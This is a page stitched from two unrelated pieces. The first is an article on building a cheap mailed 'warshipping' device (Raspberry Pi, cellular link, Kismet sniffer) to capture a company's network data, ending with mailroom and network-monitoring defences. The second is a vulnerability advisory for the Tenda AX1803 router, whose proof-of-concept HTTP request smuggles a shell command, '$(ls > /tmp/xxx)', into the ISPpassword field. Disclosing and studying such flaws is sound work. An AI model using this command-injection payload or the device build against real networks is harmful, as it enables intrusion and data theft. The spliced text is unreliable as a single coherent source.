It's frighteningly easy and inexpensive to make your own DIY version of a warshipping device. With just three hours, a couple of hundred dollars, and a few YouTube videos, nearly anyone can do it. To show you exactly how easy it is, I'm going to talk about how I built a warshipping device and then discuss what you can do to protect your company against these attacks.

**Building a Warshipping Device**

Prepare yourselves for a bit of a technical jump into hardware and software. We don't have the space here to go into every aspect of building a warshipping device, but the following should give you a harrowing sense of exactly how easy and inexpensive the process can be.

**Building hardware.** The foundation of any warshipping device is as simple as a hobbyist circuit board not much bigger than a credit card, which can operate like a miniature computer. One example is a Raspberry Pi, which is easily found online and arrives with the required software, or at least software that can also be easily found online.

Next you need a Wi-Fi dongle of some kind so your warshipping device can connect to the Internet wirelessly. A USB Wi-Fi adapter and a memory card with at least 32 GBs of storage, along with a SIM card to enable a cellular connection and optional GPS device, will complete the hardware requirements.

**Software prerequisites.** Raspberry Pis have their own Ubuntu-based operating system (OS) called Raspberry Pi OS.

Next you'll need to establish remote access. You need to find your device's IP address so you can connect to it through your computer or another device. To do that, you can run a scan on your local network or use a smartphone app. Next enter the default password for a Raspberry Pi, which is "raspberry." You now have a functional warshipping device.

**Ready for warshipping.** At last you can install your software for warshipping. Your actual warshipping software comes in two parts: your optional GPS software if you want to keep track of your device location and Kismet or a similar network-detecting software.

Kismet acts as a packet sniffer, which finds and captures packets of data from a network to store or forward that information. So Kismet can potentially be used to grab data from your network.

Your device is now ready to cause a world of pain for some poor IT team. All you have to do is send it in the mail, and when it arrives you can access sensitive data or find a vulnerable access point for an attack via the cellular connection. Then you could join the realm of malicious hackers who are costing companies worldwide $2.9 million every minute due to cybercrime.

**Key Takeaways**

So what are some useful takeaways from all of this?

First, you need to realize that this threat isn't going away. These attacks are simply too easy to launch and too hard to address. After all, who has the time to sort through all of that incoming mail as soon as it arrives?

Second, you need to develop phygital security measures as part of your overall cybersecurity efforts. Packages can sit in mailrooms for weeks — or these days, months — before someone processes them. Any of those packages could contain a warshipping device that can use their idle time gathering data from your network. Because warshipping devices can be small enough to fit between two pieces of cardboard, even an opened empty box you're saving in the mailroom to be reused at a later date could be a threat. 

To address the issue, you can start by immediately processing packages that are incorrectly addressed, since these will get returned to the sender. But you should go beyond that to process all unopened mail as quickly as possible and never retain used packaging materials in the mailroom. You can also look into the latest mail-scanning technology, which can detect these devices while avoiding the harmful effects of X-rays.

Third, network discovery software can help you pick up on unusual traffic and detect any new devices the minute they connect to your network. That means you can potentially detect a warshipping device before any damage is done. In addition, the wave of layoffs in the recent Great Resignation, insider threats from individuals who are or formerly were authorized users in your network are just as common and may be harder to detect, since these people may have access to approved credentials and devices.

Fourth, educate your employees. They likely have no idea that packages they left on their desks for a few days while they were working remotely could have a warshipping device inside, so do them and yourselves a favor by alerting them to the possible threat.

If there's one thing you've learned from this article, it should be that the phygital world is a dangerous place. But just knowing about the danger is half the battle. So now you know.

I Built a Cheap 'Warshipping' Device in Just 3 Hours — and So Can You

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

Tag

#wifi